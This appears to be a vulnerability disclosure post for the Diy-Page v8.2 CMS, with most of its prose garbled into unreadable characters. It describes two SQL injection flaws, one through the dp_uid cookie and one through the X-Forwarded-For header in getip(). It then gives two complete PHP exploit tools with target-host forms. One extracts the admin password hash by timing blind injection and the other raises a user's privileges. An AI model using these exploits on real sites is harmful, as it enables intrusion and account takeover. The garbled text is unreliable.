Diy-Page v8.2 SQLע©

[Diy-Page v8.2 SQLע© ȫ]
Ӱ汾v8.2
ܣ
DiY-Pageʼ20052ĩһȫ¸ԶŻϵͳʹɵؽ̳һ׼Żվ㡣վԴҳĽɣϵĽĹƣܲߣܹϲ...... 

һ©cookIEӳע
λã/mod/dpcms/js/buymanage.php 


 include_once PATH_PRE.''lang/''.LANGPAK.''/fore.php'';include_once PATH_PRE.''lang/''.LANGPAK.''/dpcms_fore.php'';echo $uid=$_COOKIE[''dp_uid''];$eid=intval($_GET[''eid'']);$dateformat= $d_mainset[''mod_setting''][''dpcms''][''dateformat''] ? $d_mainset[''mod_setting''][''dpcms''][''dateformat''] : ''Y-n-j H:i:s'';$islog=$db->result($db->query(''SELECT count(*) FROM ''.DP_DBPREFIX.''user_list WHERE uid=''.$uid.'' AND password="''.$_COOKIE[''dp_password''].''"'')); 
  

$_COOKIE[''dp_uid'']ûо˾ʹѯˣעûлԣֻӳע롣 

ڶ©:getipע
λã/inc/func.php

   if (getenv(''HTTP_CLIENT_IP'') and strcasecmp(getenv(''HTTP_CLIENT_IP''),''unknown'')) {  $onlineip=getenv(''HTTP_CLIENT_IP''); }elseif (getenv(''HTTP_X_FORWARDED_FOR'') and strcasecmp(getenv(''HTTP_X_FORWARDED_FOR''),''unknown'')) {  $onlineip=getenv(''HTTP_X_FORWARDED_FOR''); }elseif (getenv(''REMOTE_ADDR'') and strcasecmp(getenv(''REMOTE_ADDR''),''unknown'')) {  $onlineip=getenv(''REMOTE_ADDR''); }elseif (isset($_SERVER[''REMOTE_ADDR'']) and $_SERVER[''REMOTE_ADDR''] and strcasecmp($_SERVER[''REMOTE_ADDR''],''unknown'')) {  $onlineip=$_SERVER[''REMOTE_ADDR'']; } return preg_replace("/^([\d\.]+).*/","\\1",$onlineip);
  


 

ص㿴һ䣺preg_replace("/^([\d\.]+).*/","\\1",$onlineip);ߵͼǽIPַȥ滻+㿪ͷַ˷ǷIP1.1.1.1abcdef滻1.1.1.1ȱݣֻҪֿͷǾͲ滻© 

EXP
ӳע룺

 

<?php  

/**  

*Diy-Page v8.2 Delay SQL Injection Exploit  

*ڣ2011-2-2  

*ߣ  

*߲ͣ  

*©汾8.2  

*ٷַhttp://www.diypage.com  

**/ 

session_start();  error_reporting(0);   if(isset($_GET[''host''])&&isset($_GET[''path''])){          $host = $_GET[''host''];          $path = $_GET[''path''];          $i = $_GET[''i'']; //ascλ          $j = $_GET[''j'']; //MD5λ                    //һִʱ          if(emptyempty($j)){                  $i = 0;                  $j = 1;                  nextcrack();          }          echo "ƽ{$j}λ...<br>ƽ:".$_SESSION[pass];          $timeout = 2; //ʱʱ          $password = pass();          $time1 = gettime();//һִʱ          send();          $time2 = gettime();//ڶִʱ          if($time2-$time1>$timeout && $j<33){                  //ƽɹ MD5λ+1                  //echo chr($password[$i]);exit;                  $_SESSION[pass].=chr($password[$i]);                  $i = 0;                  $j++;                  //sleep(1);//Ϣһᡣ                  nextcrack();          }elseif($j==33){                  echo "<br>ƽ";                  unset($_SESSION[pass]);                  session_destroy();                            }else{                  //ɶûƽ                  if($i>23) $i=-1;                  $i++;                  nextcrack();          }  }   //MD5ASC  function pass(){          //0-9 a-f A-F          $pass = ''48,49,50,51,52,53,54,55,56,57,65,66,67,68,69,70,97,98,99,100,101,102'';          $pass_arr = explode('','',$pass);          return $pass_arr;  }   //ȡǰʱ  function gettime(){          $mtime = explode('' '',microtime());          $starttime = $mtime[1]+$mtime[0];          return $starttime;  }    function send(){          global $host,$path,$i,$j,$password;          $cmd = "domain=www.zyday.com";      $data = "GET ".$path."/js.php?mod=dpcms&name=buymanage HTTP/1.1\r\n";      $data .= "Accept: */*\r\n";      $data .= "Accept-Language: zh-cn\r\n";      $data .= "Content-Type: application/x-www-form-urlencoded\r\n";      $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";      $data .= "Host: $host\r\n";      $data .= "Content-Length: ".strlen($cmd)."\r\n";          $data .= "CookIE: dp_uid=1 union select benchmark(1800000,md5(1111)) from dp_user_list where uid=1 and ord(substring(password,".$j.",1))=".$password[$i]."--\r\n";      $data .= "Connection: Close\r\n\r\n";      $data .= $cmd;                    $fp = fsockopen($host, 80);                      //޷ӵ          if(!$fp){      echo ''[-]No response from''.$host;      dIE;          }       fputs($fp, $data);            $resp = '''';       while ($fp && !feof($fp))          $resp .= fread($fp, 1024);          fclose($fp);  }   //ƽһ  function nextcrack(){          global $host,$path,$i,$j;          echo ''<script>location.href="diysql.php?host=''.$host.''&path=''.$path.''&i=''.$i.''&j=''.$j.''"</script>'';  }   ?>  <html>  <title>diy-page v8.2ӳעEXP</title>  <b>diy-page v8.2ӳעEXP</b>  <form action="" method=''GET''>  <input type="hidden" name="i" value=''0''><input type="hidden" value=''1'' name=''j''>  Ŀַ<input type="text" name="host" value="*diypage''">www.sitedirsec.com">*diypageַhttp://<br>  Ŀ¼<input type="text" name="path" value="/">*ǶĿ¼򱣳Ĭ,ʽ/diypage/  <br><input type="submit" value="ʼ½" onclick="javascript:alert(''ڱվٶȱȽսкܴӰ죬ڱزEXPлл'')">  </form>  <br>  עEXPĳɹʵ״йء<a href=''/?p=63'' target=''_blank''>ӳעɹʣ</a> 

 

getip()EXP:


--------------------------------------------------------------------------------

 

<?php  

/**  

*Diy-Page v8.2 getip() remote SQL Injection Exploit  

*ڣ2011-2-2  

*ߣ  

*߲ͣ  

*©汾8.2  

*ٷַhttp://www.diypage.com  

**/ 

if (emptyempty($_POST[submit])) {            }else{          error_reporting(0);          ini_set(''max_execution_time'', 0);          $host = $_POST[host];          $path = $_POST[path];          $dpusername =  $_POST[dpusername];          $dpuserpassword =  $_POST[dpuserpassword];          $dpseccode = $_POST[dpseccode];          send();  }   function send()  {      global $host, $path,$dpusername,$dpuserpassword,$dpseccode;       $cmd = "dpusername={$dpusername}&dpuserpassword={$dpuserpassword}&dpseccode={$dpseccode}&issubmit=1";      $getinj=''zyday1.1.1.1",gid=2 where username = \''''.$dpusername.''\''#'';      $data = "POST ".$path."js.php?mod=dpuser&name=login HTTP/1.1\r\n";      $data .= "Accept: */*\r\n";      $data .= "Accept-Language: zh-cn\r\n";      $data .= "Content-Type: application/x-www-form-urlencoded\r\n";      $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";      $data .= "Host: $host\r\n";      $data .= "Content-Length: ".strlen($cmd)."\r\n";      $data .= "Connection: Close\r\n";      $data .= "X-Forwarded-For: $getinj\r\n\r\n";      $data .= $cmd;       $fp = fsockopen($host, 80);      fputs($fp, $data);       $resp = '''';       while ($fp && !feof($fp))          $resp .= fread($fp, 1024);           echo $resp;       }    ?>  <html>  <head>  <title>diypage v8.2 getip()ע</title>  </head>  <body>  <form action='''' method=''POST''>  Ŀַ<input type=''input'' name=''host'' value=''''>*http://<br>  Ŀ¼<input type=''input'' name=''path'' value=''/''>*ǶĿ¼뱣Ĭ<br>  û<input type=''input'' name=''dpusername'' value=''''>*diypageû<font color=''red''>СŲ</font><br>  룺<input type=''input'' name=''dpuserpassword'' value=''''><br>*õ  <input type=''submit'' name=''submit'' value=''Ȩ''><br>  </form>  ʾɹ½ʾȨɹȥԱ̨½ɡ<br>  <a href="" target="_blank">BY </a>  </body>  </html> 

 
